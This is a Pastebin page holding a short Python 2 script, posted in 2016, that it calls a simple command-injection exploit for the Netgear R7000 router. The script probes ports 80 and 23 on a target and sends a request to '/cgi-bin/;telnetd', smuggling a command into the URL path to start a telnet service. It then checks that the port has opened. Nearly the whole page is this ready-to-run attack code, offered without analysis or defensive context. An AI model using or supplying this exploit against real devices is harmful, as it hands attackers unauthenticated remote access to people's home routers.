daily pastebin goal
58%
SHARE
TWEET

Simple Netgear R7000 Command Injection Exploit

The_Defalt Dec 25th, 2016 467 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #! /usr/bin/python
  2.  
  3. import socket
  4. import sys
  5. import requests
  6.  
  7. #This is a pretty simple exploit, not many modules needed!
  8.  
  9.  
  10. if len(sys.argv) != 2:
  11.     print "usage: ./exploit [TARGET]"
  12.     sys.exit(1)
  13.  
  14. host = sys.argv[1]
  15.  
  16. def checkVuln():
  17.     print 'checking host... ',; sys.stdout.flush()
  18.     try:
  19.         s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  20.         result1 = s1.connect_ex((host, 80))
  21.         s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  22.         result2 = s2.connect_ex((host, 23))
  23.         s1.close()
  24.         s2.close()
  25.         if result1 == 0 and result2 != 0:
  26.             print 'done'
  27.         else:
  28.             raise Exception
  29.     except Exception:
  30.         print 'fail'
  31.         sys.exit(1)
  32.  
  33. def exploit():
  34.     print 'attempting exploit... ',; sys.stdout.flush()
  35.     try:
  36.         request = requests.get('http://' + host + '/cgi-bin/;telnetd')
  37.         print 'done'
  38.     except Exception:
  39.         print 'done'
  40.  
  41. def verify():
  42.     print 'verifying exploitation... ',; sys.stdout.flush()
  43.     try:
  44.         s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  45.         result = s.connect_ex((host, 23))
  46.         s.close()
  47.         if result == 0:
  48.             print 'success!'
  49.         else:
  50.             raise Exception
  51.     except Exception:
  52.         print 'fail'
  53.         sys.exit(1)
  54.  
  55. checkVuln()
  56. exploit()
  57. verify()
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top